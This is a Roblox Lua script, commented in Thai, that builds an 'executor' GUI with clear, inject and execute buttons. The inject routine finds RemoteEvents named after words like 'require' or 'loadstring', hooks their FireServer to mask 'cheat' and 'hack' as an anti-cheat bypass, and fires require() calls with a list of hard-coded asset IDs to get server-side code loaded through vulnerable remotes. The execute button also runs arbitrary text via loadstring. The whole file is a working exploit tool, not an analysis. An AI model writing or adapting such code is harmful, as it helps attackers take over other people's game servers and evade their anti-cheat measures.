local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local player = Players.LocalPlayer local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "ScreenGui" ScreenGui.Parent = player:WaitForChild("PlayerGui") local Frame = Instance.new("Frame") Frame.Name = "Frame" Frame.Parent = ScreenGui Frame.BackgroundColor3 = Color3.fromRGB(0, 255, 0) Frame.BackgroundTransparency = 0 Frame.BorderColor3 = Color3.fromRGB(0, 127, 0) Frame.BorderSizePixel = 5 Frame.Position = UDim2.new(0, 40, 0, 20) Frame.Size = UDim2.new(0, 400, 0, 250) Frame.AnchorPoint = Vector2.new(0, 0) Frame.Visible = true Frame.ZIndex = 1 Frame.ClipsDescendants = false Frame.LayoutOrder = 0 Frame.Active = true -- ลาก Frame local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart Frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end Frame.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = Frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) Frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end) -- ปุ่ม clear local clear = Instance.new("TextButton") clear.Name = "clear" clear.Parent = Frame clear.BackgroundColor3 = Color3.fromRGB(0, 255, 0) clear.BackgroundTransparency = 0 clear.BorderColor3 = Color3.fromRGB(0, 127, 0) clear.BorderSizePixel = 1 clear.Position = UDim2.new(0, 140, 0, 205) clear.Size = UDim2.new(0, 100, 0, 40) clear.Font = Enum.Font.Highway clear.Text = "clear" clear.TextColor3 = Color3.fromRGB(0, 0, 0) clear.TextSize = 12 clear.TextScaled = false clear.TextWrapped = false clear.TextTransparency = 0 clear.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) clear.TextStrokeTransparency = 1 clear.AnchorPoint = Vector2.new(0, 0) clear.Visible = true clear.ZIndex = 1 clear.ClipsDescendants = false clear.LayoutOrder = 0 clear.Active = true clear.LineHeight = 1 clear.MaxVisibleGraphemes = -1 -- ปุ่ม inject local inject = Instance.new("TextButton") inject.Name = "inject" inject.Parent = Frame inject.BackgroundColor3 = Color3.fromRGB(0, 255, 0) inject.BackgroundTransparency = 0 inject.BorderColor3 = Color3.fromRGB(0, 127, 0) inject.BorderSizePixel = 1 inject.Position = UDim2.new(0, 270, 0, 205) inject.Size = UDim2.new(0, 100, 0, 40) inject.Font = Enum.Font.Highway inject.Text = "inject" inject.TextColor3 = Color3.fromRGB(0, 0, 0) inject.TextSize = 12 inject.TextScaled = false inject.TextWrapped = false inject.TextTransparency = 0 inject.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) inject.TextStrokeTransparency = 1 inject.AnchorPoint = Vector2.new(0, 0) inject.Visible = true inject.ZIndex = 1 inject.ClipsDescendants = false inject.LayoutOrder = 0 inject.Active = true inject.LineHeight = 1 inject.MaxVisibleGraphemes = -1 -- ปุ่ม execute local execute = Instance.new("TextButton") execute.Name = "execute" execute.Parent = Frame execute.BackgroundColor3 = Color3.fromRGB(0, 255, 0) execute.BackgroundTransparency = 0 execute.BorderColor3 = Color3.fromRGB(0, 127, 0) execute.BorderSizePixel = 1 execute.Position = UDim2.new(0, 10, 0, 205) execute.Size = UDim2.new(0, 100, 0, 40) execute.Font = Enum.Font.Highway execute.Text = "execute" execute.TextColor3 = Color3.fromRGB(0, 0, 0) execute.TextSize = 12 execute.TextScaled = false execute.TextWrapped = false execute.TextTransparency = 0 execute.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) execute.TextStrokeTransparency = 1 execute.AnchorPoint = Vector2.new(0, 0) execute.Visible = true execute.ZIndex = 1 execute.ClipsDescendants = false execute.LayoutOrder = 0 execute.Active = true execute.LineHeight = 1 execute.MaxVisibleGraphemes = -1 -- TextLabel ชื่อ executor local TextLabel = Instance.new("TextLabel") TextLabel.Name = "TextLabel" TextLabel.Parent = Frame TextLabel.BackgroundColor3 = Color3.fromRGB(0, 255, 0) TextLabel.BackgroundTransparency = 0 TextLabel.BorderColor3 = Color3.fromRGB(0, 255, 0) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0, 130, 0, 0) TextLabel.Size = UDim2.new(0, 140, 0, 24) TextLabel.Font = Enum.Font.ArialBold TextLabel.Text = "OPss executor ss v2" TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel.TextSize = 14 TextLabel.TextScaled = false TextLabel.TextWrapped = false TextLabel.TextTransparency = 0 TextLabel.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) TextLabel.TextStrokeTransparency = 1 TextLabel.AnchorPoint = Vector2.new(0, 0) TextLabel.Visible = true TextLabel.ZIndex = 1 TextLabel.ClipsDescendants = false TextLabel.LayoutOrder = 0 TextLabel.Active = true TextLabel.LineHeight = 1 TextLabel.MaxVisibleGraphemes = -1 -- TextBox ไม่แก้ไข local TextBox = Instance.new("TextBox") TextBox.Name = "TextBox" TextBox.Parent = Frame TextBox.BackgroundColor3 = Color3.fromRGB(191, 255, 127) TextBox.BackgroundTransparency = 0 TextBox.BorderColor3 = Color3.fromRGB(0, 127, 0) TextBox.BorderSizePixel = 1 TextBox.Position = UDim2.new(0, 10, 0, 25) TextBox.Size = UDim2.new(0, 380, 0, 175) TextBox.Font = Enum.Font.Highway TextBox.Text = "require(9999999).load(\"OPSsk1ddalt\")" TextBox.TextColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextSize = 14 TextBox.TextScaled = false TextBox.TextWrapped = false TextBox.TextTransparency = 0 TextBox.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextStrokeTransparency = 1 TextBox.AnchorPoint = Vector2.new(0, 0) TextBox.Visible = true TextBox.ZIndex = 1 TextBox.ClipsDescendants = false TextBox.LayoutOrder = 0 TextBox.ClearTextOnFocus = true TextBox.PlaceholderText = "" TextBox.PlaceholderColor3 = Color3.fromRGB(191, 255, 127) TextBox.MultiLine = false TextBox.Active = true TextBox.LineHeight = 1 TextBox.CursorPosition = 1 TextBox.TextEditable = true TextBox.MaxVisibleGraphemes = -1 -- ฟังก์ชัน clear textbox clear.MouseButton1Click:Connect(function() TextBox.Text = "" end) -- ตัวแปรสำหรับ inject (ยิง require ไป RemoteEvent ช่องโหว่) local ids = { 7212439806, 5042448150, 2751579481, 9436935779, 5025864748, 2782124456, 13401911434, 4920584722, 9479584291, 6519023805, 11275669085, } local keywords = {"require", "loadstring", "execute", "run", "load", "script"} -- เก็บ RemoteEvent ที่ Hook แล้ว local hookedRemotes = {} local function hookRemote(remote) if hookedRemotes[remote] then return end -- hook แค่ครั้งเดียว local oldFireServer = remote.FireServer remote.FireServer = function(self, ...) local args = {...} -- แก้ไขข้อความก่อนส่งเพื่อ bypass anti-cheat (ตัวอย่าง) for i, v in ipairs(args) do if type(v) == "string" then v = v:gsub("cheat", "c****") v = v:gsub("hack", "h****") args[i] = v end end return oldFireServer(self, table.unpack(args)) end hookedRemotes[remote] = true end inject.MouseButton1Click:Connect(function() local remotes = {} for _, v in pairs(game:GetDescendants()) do if v:IsA("RemoteEvent") then local lowerName = v.Name:lower() for _, word in pairs(keywords) do if lowerName:find(word) then table.insert(remotes, v) break end end end end for _, remote in pairs(remotes) do hookRemote(remote) end for _, remote in pairs(remotes) do for _, id in pairs(ids) do pcall(function() remote:FireServer("require("..id..")") end) end end end) -- ฟังก์ชัน execute run lua/loadstring + require().load() execute.MouseButton1Click:Connect(function() local code = TextBox.Text if not code or code == "" then return end -- ตรวจสอบว่าเป็นรูปแบบ require(id).load("playername") local id, username = code:match("require%((%d+)%)%.load%([\"'](.-)[\"']%)") if id and username then -- ยิงไป RemoteEvent ที่ Hook ไว้แทน for remote,_ in pairs(hookedRemotes) do pcall(function() remote:FireServer("require("..id..").load(\""..username.."\")") end) end return end -- ถ้าไม่ใช่ฟอร์แมตนั้น ให้รัน loadstring ปกติ local success, err = pcall(function() local func = loadstring(code) if func then func() else error("Invalid Lua code") end end) if not success then warn("Error running code:", err) end end)